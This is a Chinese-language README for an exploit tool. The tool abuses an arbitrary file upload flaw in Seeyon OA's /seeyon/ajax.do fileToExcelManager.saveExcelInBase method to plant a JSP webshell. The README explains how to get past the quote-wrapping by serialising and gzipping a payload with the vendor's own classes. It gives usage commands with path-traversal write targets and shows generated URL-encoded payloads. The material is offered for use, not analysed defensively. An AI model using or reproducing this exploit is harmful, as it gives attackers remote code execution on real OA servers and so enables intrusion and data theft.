致远OA文件上传漏洞利用工具 - 实现JSP WebShell绕过双引号限制

工具介绍

该项目是一个针对致远OA系统 /seeyon/ajax.do 接口中 fileToExcelManager.saveExcelInBase 方法的任意文件上传漏洞的利用工具。由于接口对上传内容进行了序列化处理，普通上传会导致内容被双引号包裹，导致 JSP WebShell 无法正常解析。
该工具通过构造合法的 DataRecord 对象，并使用致远自身的 JSONUtil 和 ZipUtil 工具类将其压缩成 gzip 格式 payload，生成可被目标接口正确解析的上传数据，从而实现绕过双引号限制，成功写入并执行 JSP WebShell。

自动草稿

功能特性

自动读取本地 WebShell 文件内容并生成对应 payload；
支持自定义上传路径（默认随机文件名）；
使用致远官方 Jar 包进行序列化与压缩处理，保证格式兼容；
解决中文编码及 URLEncoder 编码问题，支持直接用于 POST 请求；
输出可直接用于漏洞利用的 payload 参数。

使用帮助

java -jar FileToExcelManagerPayload.jar Usage: java -Dfile.encoding=UTF-8 -jar ManagerPayload.jar <jspFilePath> [address] Example (random filename): java -Dfile.encoding=UTF-8 -jar ManagerPayload.jar webshell.jsp Example (custom address): java -Dfile.encoding=UTF-8 -jar ManagerPayload.jar webshell.jsp ../webapps/ROOT/test.jsp  Note: If address is not provided, a random filename will be generated in ../webapps/ROOT/

默认使用，将webshell.jsp转换为gzip格式payload，上传的webshell地址为 ../webapps/ROOT/zu3lxc.jsp

java -Dfile.encoding=UTF-8 -jar FileToExcelManagerPayload.jar webshell.jsp  [+] Reading JSP file: webshell.jsp [+] Using address: ../webapps/ROOT/if6tve.jsp  [+] Generated payload: %1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C2%B1%0A%C3%820%14E%7F%C2%A5%3C%28%28%C2%84%C3%94%C3%89%C2%A1%C2%8As%07%C2%B1+%C2%85%0EM%C2%87h%C2%A3%C2%8D%C2%BC%26%21y%C2%B1%C2%83%C3%B8%C3%AFF%0A%0Er%C2%A7%7B9%C2%9C%C3%9B%01%C3%A7%C3%85%C2%AC.%C3%92%C2%B9P%C2%9C%C3%AB%C2%BA%29%C3%B4mKO%C3%85%1F%C3%81%01%03%C2%91%02%C3%AC%05W%C2%8Bq2%279%29%28%3B%10F%C3%B8%7D%C2%9E%C3%99H%C3%9Cym%08%C3%8DJ%40%C2%A5%10m%C3%96Z%C2%8F%C2%83%C2%80%C3%B5.%C3%8B%0F%09K+%C3%B4%0C%06I%C2%B2Rr8%C3%AA%40I%C2%90%C2%96E%C3%98j%1A%C2%A14%11%C2%91A%18%C2%95%C2%A2%C3%A5a%19H%13%C3%BEJ%C2%88%C2%97%C3%A6%C2%AFWJ%C3%9F%C3%87%C2%A4%C3%9B0%C3%B0v%C3%BEj%C3%9F%C3%BD%07%C2%B2v%C2%84%C2%83%C3%8F%00%00%00  [+] Done

自定义上传地址，将webshell.jsp转换为gzip格式payload，上传的webshell地址为 ../../test/ROOT/test.jsp

java -Dfile.encoding=UTF-8 -jar FileToExcelManagerPayload.jar webshell.jsp ../../test/ROOT/test.jsp  [+] Reading JSP file: webshell.jsp [+] Using address: ../../test/ROOT/test.jsp  [+] Generated payload: %1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C3%81%0A%C3%820%10D%7F%C2%A5%2C%14%14B%C3%AA%C2%B9%C2%8A%C3%A7%1E%C3%84%C2%82%14zhz%C2%886%C3%98%C2%94mR%C2%92%0D%1E%C3%84%7Fw%C2%B5%C3%A0Af%0F3%C3%83%C3%B0%C2%B6%03%29%0B%3E2%C2%91%C2%8AK%5D7_%27%C2%A7%C2%B8%C2%80%00%C3%85%02%C3%B1%C2%84%C2%9B%C3%874%C2%BB%C2%B3%C2%9E%0D%C2%94%1D%28%C2%A7%C3%82%21%C3%8F%7C%22%C2%B9%04%C3%AB%08%C3%9DFAe%10%7D%C3%96%C3%BA%C2%80%C2%83%C2%82%C3%AD%3E%C3%8B%C2%8F%3C%C3%A3%21%C3%B4%02%06M%C2%BA2z8%C3%99H%0C%C3%A0f%05%C2%B6%C2%96F%28%5DB%14%10Gch%C3%BD%C2%B0%16d%09%7F%21%C2%A6k%C3%B3%C2%97%2Bc%C3%AF%23%C3%A3v%02%C2%82%7F%7C%C2%B0%C2%AF%C3%BE%0D%05%C3%A2%3B%C2%A2%C3%8D%00%00%00